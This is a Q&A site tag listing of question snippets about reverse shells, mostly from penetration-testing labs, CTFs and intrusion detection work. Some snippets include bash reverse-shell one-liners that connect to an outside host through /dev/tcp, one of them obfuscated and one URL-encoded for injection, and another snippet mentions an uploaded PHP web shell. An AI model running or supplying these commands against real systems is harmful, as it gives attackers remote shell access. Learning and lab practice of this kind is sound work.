Questions tagged [reverse-shell]
The reverse-shell tag has no usage guidance.
58
questions
1
vote
0
answers
32
views
Getting reverse shell as another user
I'm performing Overpass the hash attack @ CompTIA Pentest+ > Attacks and Exploits > Lateral Movement and Pivoting > Task 3 > Let's Get to Work!
I dumped Key of my target user: t1_toby.beck ...
0
votes
0
answers
60
views
Why does my uploaded shell as .php gets downloaded rather than executed when I hit the URL?
I have uploaded a php shell using a file upload vulnerability. But when I hit the .php url after uploading it. It gets downloaded rather than executed. Why is that. And how can I execute my shell code?...
0
votes
1
answer
69
views
Reverse Shell payload does not work
$(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27')
-i: -c: line 1: unexpected EOF while looking for matching `''
I was trying to get a ...
1
vote
0
answers
217
views
Create and bind to Metasploit reverse shell on Apple Sillicon system
I'm trying to create a persistence module for OSX systems but first I need to create a reverse shell that spawns and binds on the same computer over a LAN. I'm having trouble creating an executable ...
0
votes
1
answer
193
views
Snort rule doesn't match the content in Meterpreter session packet
I'm working on a university project and I'm trying to identify a reverse shell attack with Snort IDS.
For the attack I used Meterpreter/reverse_tcp and analyzed the packets via Wireshark for traces to ...
0
votes
0
answers
748
views
Bash reverse shell as a URL parameter value
I try to put bash reverse shell as a URL parameter. The command is as follows:
bash -i >& /dev/tcp/192.168.56.105/4444 0>&1
I have encoded the above code with URL encoding
bash%20-i%20%...
0
votes
1
answer
149
views
Auto-opening a reverse bash shell
Is it possible to use a tool like netcat to create a listener on the attacker's device with a specific command that when the target device or machine connects to this IP and port, it runs a bash shell ...
0
votes
0
answers
288
views
Running code on attacker machine from a reverse ssh exploit? (Low level theoretical explanation required)
Reverse shell. A victim server runs a malicious binary which creates an SSH connection to the attacker machine. Then the attacker machine SSH's to the victim server and runs commands (that way you ...
0
votes
0
answers
230
views
Is it possible to disable screenshare if someone's got meterpreter shell on your PC?
If hypothetically there was a meterpreter shell installed on your pc, are there security features or ways to harden a Windows laptop to prevent the hacker from using the screen share command to spy on ...
0
votes
1
answer
361
views
If a reverse shell target is an administrator does the attacker have admin?
If a reverse shell target is an administrator does the attacker have admin?
I've been trying to find the answer to this but can only find general information on how they connect to a target and not ...
1
vote
0
answers
810
views
Reverse shell not working [closed]
I'm running a DVWA container on my kali VM using:
docker run --rm -it -p 80:80 vulnerables/web-dvwa
Network interface details:
Kali docker0 int: 172.17.0.1/16
Kali eth0 int: 192.168.1.233/24
DVWA ...
0
votes
2
answers
332
views
if an attacker connects to your machine with a reverse shell can you take control of their machine using the listener they setup
If an attacker were to set up a netcat listener (nc -lvnp 4444), then is it possible to take control of their device using that listener? Whenever I look for an answer online, all I can find is how to ...
1
vote
1
answer
420
views
Why do you need to wrap bash command inside another when opening a reverse shell?
In the CSAW 2022 web challenge, called "my little website", a youtuber in this video used a vulnerability in md-to-pdf to run arbitrary js, and this is the payload used:
---js
((require[&...
0
votes
0
answers
264
views
I cannot make a reverse connection
I am playing with a Linux CTF server and came across a kind of reverse connection block. I uploaded a php webshell, gained control of www-data user and tried to make a reverse shell.
Possible a UFW ...
0
votes
0
answers
121
views
Is it possible to reverse the connection of a client connected to a Google Meeting?
I was watching some videos of Jim Browning on Youtube and I have noticed that he reverses the connection of the scammer and gets remote access to their devices.
So I was wondering about the risks that ...